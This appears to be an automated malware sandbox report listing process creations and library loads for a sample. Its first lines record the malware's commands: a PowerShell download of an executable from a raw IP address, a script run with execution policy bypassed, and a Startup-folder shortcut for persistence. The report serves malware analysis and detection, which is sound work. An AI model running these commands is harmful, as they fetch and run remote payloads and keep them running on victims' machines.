Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: imgutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
